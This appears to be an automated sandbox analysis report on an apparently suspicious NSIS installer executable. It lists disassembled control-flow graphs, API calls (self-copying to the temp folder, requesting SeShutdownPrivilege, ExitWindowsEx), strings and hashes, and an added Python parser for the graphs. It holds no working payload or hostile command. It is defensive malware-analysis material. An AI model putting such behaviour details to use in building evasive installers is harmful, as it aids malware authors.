GetDlgItemTextW 5540->5600 5542 40467e GetDlgItem 5541->5542 5549 4046dd 5541->5549 5545 404692 5542->5545 5544 40466c 5547 4061dc 5 API calls 5544->5547 5548 4046a6 SetWindowTextW 5545->5548 5552 405a3e 4 API calls 5545->5552 5546 4047c1 5598 404955 5546->5598 5602 405708 GetDlgItemTextW 5546->5602 5547->5541 5553 40419a 19 API calls 5548->5553 5549->5546 5554 405f6a 18 API calls 5549->5554 5549->5598 5551 404201 8 API calls 5556 404969 5551->5556 5557 40469c 5552->5557 5558 4046c2 5553->5558 5559 404751 SHBrowseForFolderW 5554->5559 5555 4047f1 5560 405a9b 18 API calls 5555->5560 5557->5548 5564 405993 3 API calls 5557->5564 5561 40419a 19 API calls 5558->5561 5559->5546 5562 404769 CoTaskMemFree 5559->5562 5563 4047f7 5560->5563 5565 4046d0 5561->5565 5566 405993 3 API calls 5562->5566 5603 405f48 lstrcpynW 5563->5603 5564->5548 5601 4041cf SendMessageW 5565->5601 5568 404776 5566->5568 5571 4047ad SetDlgItemTextW 5568->5571 5575 405f6a 18 API calls 5568->5575 5570 4046d6 5573 4062b2 3 API calls 5570->5573 5571->5546 5572 40480e 5574 4062b2 3 API calls 5572->5574 5573->5549 5582 404816 5574->5582 5576 404795 lstrcmpiW 5575->5576 5576->5571 5578 4047a6 lstrcatW 5576->5578 5577 404855 5604 405f48 lstrcpynW 5577->5604 5578->5571 5580 40485c 5581 405a3e 4 API calls 5580->5581 5583 404862 GetDiskFreeSpaceW 5581->5583 5582->5577 5586 4059df 2 API calls 5582->5586 5587 4048a7 5582->5587 5585 404885 MulDiv 5583->5585 5583->5587 5585->5587 5586->5582 5588 4049d6 21 API calls 5587->5588 5597 404904 5587->5597 5589 4048f6 5588->5589 5592 404906 SetDlgItemTextW 5589->5592 5593 4048fb 5589->5593 5590 40140b 2 API calls 5591 404927 5590->5591 5605 4041bc KiUserCallbackDispatcher 5591->5605 5592->5597 5595 4049d6 21 API calls 5593->5595 5595->5597 5596 404943 5596->5598 5606 4045ca 5596->5606 5597->5590 5597->5591 5598->5551 5600->5544 5601->5570 5602->5555 5603->5572 5604->5580 5605->5596 5607 4045d8 5606->5607 5608 4045dd SendMessageW 5606->5608 5607->5608 5608->5598 5609 
4027b5 5610 402b3a 18 API calls 5609->5610 5611 4027c3 5610->5611 5612 4027d9 5611->5612 5613 402b3a 18 API calls 5611->5613 5614 405b8f 2 API calls 5612->5614 5613->5612 5615 4027df 5614->5615 5635 405bb4 GetFileAttributesW CreateFileW 5615->5635 5617 4027ec 5618 402895 5617->5618 5619 4027f8 GlobalAlloc 5617->5619 5622 4028b0 5618->5622 5623 40289d DeleteFileW 5618->5623 5620 402811 5619->5620 5621 40288c CloseHandle 5619->5621 5636 40330f SetFilePointer 5620->5636 5621->5618 5623->5622 5625 402817 5626 4032f9 ReadFile 5625->5626 5627 402820 GlobalAlloc 5626->5627 5628 402830 5627->5628 5629 402864 WriteFile GlobalFree 5627->5629 5630 403062 46 API calls 5628->5630 5631 403062 46 API calls 5629->5631 5634 40283d 5630->5634 5632 402889 5631->5632 5632->5621 5633 40285b GlobalFree 5633->5629 5634->5633 5635->5617 5636->5625 5637 4028b6 5638 402b1d 18 API calls 5637->5638 5639 4028bc 5638->5639 5640 4028f8 5639->5640 5641 4028df 5639->5641 5645 402793 5639->5645 5643 402902 5640->5643 5644 40290e 5640->5644 5642 4028e4 5641->5642 5650 4028f5 5641->5650 5651 405f48 lstrcpynW 5642->5651 5646 402b1d 18 API calls 5643->5646 5647 405f6a 18 API calls 5644->5647 5646->5650 5647->5650 5650->5645 5652 405e8f wsprintfW 5650->5652 5651->5645 5652->5645 5653 404337 5654 40434f 5653->5654 5660 404469 5653->5660 5658 40419a 19 API calls 5654->5658 5655 4044d3 5656 4045a5 5655->5656 5657 4044dd GetDlgItem 5655->5657 5663 404201 8 API calls 5656->5663 5659 4044f7 5657->5659 5664 404566 5657->5664 5662 4043b6 5658->5662 5659->5664 5668 40451d 6 API calls 5659->5668 5660->5655 5660->5656 5661 4044a4 GetDlgItem SendMessageW 5660->5661 5684 4041bc KiUserCallbackDispatcher 5661->5684 5666 40419a 19 API calls 5662->5666 5667 4045a0 5663->5667 5664->5656 5669 404578 5664->5669 5671 4043c3 CheckDlgButton 5666->5671 5668->5664 5672 40458e 5669->5672 5673 40457e SendMessageW 5669->5673 5670 4044ce 5674 4045ca SendMessageW 5670->5674 5682 4041bc KiUserCallbackDispatcher 5671->5682 5672->5667 
5676 404594 SendMessageW 5672->5676 5673->5672 5674->5655 5676->5667 5677 4043e1 GetDlgItem 5683 4041cf SendMessageW 5677->5683 5679 4043f7 SendMessageW 5680 404414 GetSysColor 5679->5680 5681 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5679->5681 5680->5681 5681->5667 5682->5677 5683->5679 5684->5670 5685 4014b8 5686 4014be 5685->5686 5687 401389 2 API calls 5686->5687 5688 4014c6 5687->5688 4702 4015b9 4703 402b3a 18 API calls 4702->4703 4704 4015c0 4703->4704 4705 405a3e 4 API calls 4704->4705 4713 4015c9 4705->4713 4706 401614 4708 401619 4706->4708 4709 401646 4706->4709 4707 4059c0 CharNextW 4710 4015d7 CreateDirectoryW 4707->4710 4711 401423 25 API calls 4708->4711 4715 401423 25 API calls 4709->4715 4710->4713 4714 4015ed GetLastError 4710->4714 4712 401620 4711->4712 4720 405f48 lstrcpynW 4712->4720 4713->4706 4713->4707 4714->4713 4717 4015fa GetFileAttributesW 4714->4717 4719 40163e 4715->4719 4717->4713 4718 40162d SetCurrentDirectoryW 4718->4719 4720->4718 5689 401939 5690 402b3a 18 API calls 5689->5690 5691 401940 lstrlenW 5690->5691 5692 4024e8 5691->5692 5693 40293b 5694 402b1d 18 API calls 5693->5694 5695 402941 5694->5695 5696 402974 5695->5696 5697 402793 5695->5697 5699 40294f 5695->5699 5696->5697 5698 405f6a 18 API calls 5696->5698 5698->5697 5699->5697 5701 405e8f wsprintfW 5699->5701 5701->5697 5702 40683c 5704 406421 5702->5704 5703 406d8c 5704->5703 5705 4064a2 GlobalFree 5704->5705 5706 4064ab GlobalAlloc 5704->5706 5707 406522 GlobalAlloc 5704->5707 5708 406519 GlobalFree 5704->5708 5705->5706 5706->5703 5706->5704 5707->5703 5707->5704 5708->5707 4936 40173f 4937 402b3a 18 API calls 4936->4937 4938 401746 4937->4938 4939 405be3 2 API calls 4938->4939 4940 40174d 4939->4940 4941 405be3 2 API calls 4940->4941 4941->4940 5709 10002a7f 5710 10002a97 5709->5710 5711 1000158f 2 API calls 5710->5711 5712 10002ab2 5711->5712

                                                  Control-flow Graph

                                                  control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 4059c0 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f48 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 49 403657-40365e call 40391f 46->49 50 4035c8-4035d3 call 4059c0 46->50 59 403663 49->59 63 403621-40362b 50->63 64 4035d5-40360a 50->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 69 403823-403827 ExitProcess 61->69 70 40381f 61->70 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 67 403692-4036ac lstrcatW lstrcmpiW 63->67 68 40362d-40363b call 405a9b 63->68 65 40360c-403610 64->65 73 403612-403617 65->73 74 403619-40361d 65->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f48 * 2 68->83 70->69 73->74 78 40361f 73->78 74->65 74->78 80 4036d1-4036fa call 405f48 76->80 81 
4036c6-4036cc call 405f48 76->81 78->63 91 4036ff-40371b call 405f6a DeleteFileW 80->91 81->80 83->49 101 40375c-403764 91->101 102 40371d-40372d CopyFileW 91->102 104 403801-40380c ExitWindowsEx 92->104 105 4037f5-4037ff 92->105 93->92 96 4037a1-4037a3 93->96 96->92 103 4037a5-4037b7 GetCurrentProcess 96->103 101->91 107 403766-40376d call 405de2 101->107 102->101 106 40372f-40374f call 405de2 call 405f6a call 4056c3 102->106 103->92 115 4037b9-4037db 103->115 104->61 109 40380e-403810 call 40140b 104->109 105->104 105->109 106->101 122 403751-403758 CloseHandle 106->122 107->45 109->61 115->92 122->101
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403379
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                  • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000), ref: 004033DB
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000020), ref: 00403403
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403558
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403574
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403585
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040358D
                                                  • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                  • OleUninitialize.OLE32(?), ref: 0040366C
                                                  • ExitProcess.KERNEL32 ref: 0040368C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000,?), ref: 00403698
                                                  • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000,?), ref: 004036A4
                                                  • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004036B0
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 004036B7
                                                  • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,0041FEA8,?), ref: 00403725
                                                  • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                  • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                  • ExitProcess.KERNEL32 ref: 00403827
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231$C:\Users\user\Desktop$C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-1195976803
                                                  • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                  • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                  • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                  • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
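The flattened `control_flow_graph` dump for 40335a above (a decimal block id, its address range, the API and `call` labels of that block, then `src->dst` edges) is much easier to query once parsed. The Python below is an added example written for this page, not Joe Sandbox code. It parses a trimmed excerpt of that graph (the blocks and edges are copied from the dump; blocks off the paths to ExitProcess and ExitWindowsEx, and the edges into them, are left out) and answers two triage questions: which APIs run on the shortest path from the entry block to ExitWindowsEx, and how often each internal sub-function is called. The token grammar it relies on (decimal block ids, `hex` or `hex-hex` ranges, `call addr`, and `* N` repeat markers) is inferred from this dump, not documented by the tool, and is an assumption of the example.

```python
"""Parse the flattened control_flow_graph dumps in this report and answer
reachability questions about them (added example, not Joe Sandbox code)."""
import re
from collections import Counter, deque

# Token shapes in the dump (assumed from the report text): block id = decimal,
# block range = hex or hex-hex, edge = "src->dst"; any other token is a label.
BLOCK_RE = re.compile(r"[0-9a-f]+(?:-[0-9a-f]+)?")
EDGE_RE = re.compile(r"(\d+)->(\d+)")
HEX_RE = re.compile(r"[0-9a-f]+")
NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Excerpt of the 40335a graph above: blocks on the paths to ExitProcess and
# ExitWindowsEx copied from the dump; other blocks and edges into them dropped.
CFG_40335A_EXCERPT = (
    "control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 "
    "SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW "
    "7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 "
    "11 40350a-403510 8->11 13 403516 11->13 16 40352a-403544 GetTempPathW "
    "call 403326 13->16 23 403546-403564 GetWindowsDirectoryW lstrcatW "
    "call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 23->24 "
    "45 403667-403676 call 40382d OleUninitialize 24->45 56 403772-403778 45->56 "
    "57 40367c-40368c call 405724 ExitProcess 45->57 61 403815-40381d 56->61 "
    "62 40377e-40379b call 4062b2 * 3 56->62 69 403823-403827 ExitProcess 61->69 "
    "92 4037e5-4037f3 call 4062b2 62->92 104 403801-40380c ExitWindowsEx 92->104 "
    "104->61"
)

def parse_cfg(text):
    # Returns ({block_id: {"addr", "labels"}}, {block_id: [successor ids]}).
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, succ, cur, i = {}, {}, None, 0
    while i < len(toks):
        tok, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else "")
        m = EDGE_RE.fullmatch(tok)
        if m:                                               # "src->dst"
            succ.setdefault(int(m[1]), []).append(int(m[2]))
            i += 1
        # A decimal followed by an address opens a block, unless the decimal is
        # itself a "* N" count or an all-digit "call" target.
        elif tok.isdigit() and BLOCK_RE.fullmatch(nxt) and (
                i == 0 or toks[i - 1] not in ("*", "call")):
            cur = int(tok)
            blocks[cur] = {"addr": nxt, "labels": []}
            i += 2
        else:                                               # label of current block
            if cur is not None:
                blocks[cur]["labels"].append(tok)
            i += 1
    for b in blocks:
        succ.setdefault(b, [])
    return blocks, succ

def expand_labels(labels):
    # Label tokens -> (kind, name, count); kind is "api" or "call", and a
    # trailing "* N" repeats the preceding item N times. "#17" (ordinal) is skipped.
    items, i = [], 0
    while i < len(labels):
        tok, nxt = labels[i], (labels[i + 1] if i + 1 < len(labels) else "")
        if tok == "call" and HEX_RE.fullmatch(nxt):
            items.append(["call", nxt, 1])
            i += 2
        elif tok == "*" and nxt.isdigit() and items:
            items[-1][2] = int(nxt)
            i += 2
        else:
            if tok != "call" and NAME_RE.fullmatch(tok) and not HEX_RE.fullmatch(tok):
                items.append(["api", tok, 1])
            i += 1
    return [tuple(x) for x in items]

def api_names(block):
    return [name for kind, name, _ in expand_labels(block["labels"]) if kind == "api"]

def shortest_path(succ, start, is_goal):
    # BFS from start to the nearest block for which is_goal(block_id) holds.
    parent, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if is_goal(n):
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for s in succ.get(n, []):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return None

def path_to_api(blocks, succ, start, api):
    return shortest_path(succ, start, lambda n: api in api_names(blocks[n]))

def apis_along(blocks, path):
    return [name for n in path for name in api_names(blocks[n])]

def call_targets(blocks):
    # How many times each internal sub-function is called across the graph.
    counts = Counter()
    for blk in blocks.values():
        for kind, target, n in expand_labels(blk["labels"]):
            if kind == "call":
                counts[target] += n
    return counts

if __name__ == "__main__":
    blocks, succ = parse_cfg(CFG_40335A_EXCERPT)
    path = path_to_api(blocks, succ, 0, "ExitWindowsEx")
    print("path:", path, "APIs:", apis_along(blocks, path))
    print("sub-call counts:", dict(call_targets(blocks)))
```

Paste the full `control_flow_graph` line from the report in place of the excerpt to run the same queries on the complete graph; the parser does not require the edges to be sorted or grouped with their blocks.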

                                                  Control-flow Graph

                                                  control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 141 405573-405583 ShowWindow 135->141 142 40554d-405559 call 404173 135->142 136->134 139 40559f-4055a5 136->139 139->134 148 4055a7-4055ba SendMessageW 139->148 144 405593-405594 call 404173 141->144 145 405585-40558e call 4051f2 141->145 142->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 164 40561b-405632 160->164 161->160 165 405488 162->165 166 40547b-405486 ShowWindow 162->166 163->155 167 4054c0-4054d8 SendMessageW * 2 163->167 168 405637-405652 SendMessageW 164->168 169 40548e-405494 call 4041cf 165->169 166->169 167->155 168->168 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                  • GetClientRect.USER32(?,?), ref: 004053DC
                                                  • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405480
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                    • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                  • ShowWindow.USER32(00000000), ref: 0040552C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405531
                                                  • ShowWindow.USER32(00000008), ref: 0040557B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                  • CreatePopupMenu.USER32 ref: 004055C0
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                  • GetWindowRect.USER32(?,?), ref: 004055F4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                  • OpenClipboard.USER32(00000000), ref: 00405655
                                                  • EmptyClipboard.USER32 ref: 0040565B
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                  • CloseClipboard.USER32 ref: 004056B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {$&B
                                                  • API String ID: 590372296-2518801558
                                                  • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                  • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                  • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                  • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                  Control-flow Graph

                                                  control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->446 460 4060b3-4060b6 455->460 461 4060a5-4060b1 GetSystemDirectoryW 455->461 462 406088-40608c 456->462 457->441 459 40617b 457->459 463 40613c-406142 call 4061dc 459->463 465 406121-406123 460->465 466 4060b8-4060c6 GetWindowsDirectoryW 460->466 464 406125-406129 461->464 467 406092-40609b call 405f6a 462->467 468 40612b-40612f 462->468 463->441 464->463 464->468 465->464 469 4060c8-4060d2 465->469 466->465 467->464 468->463 472 406131-406137 lstrcatW 468->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 472->463 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->464 478->479 479->465 480->464 480->475
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                  • CoTaskMemFree.OLE32(?), ref: 00406113
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                  Strings
                                                  Memory Dump Source
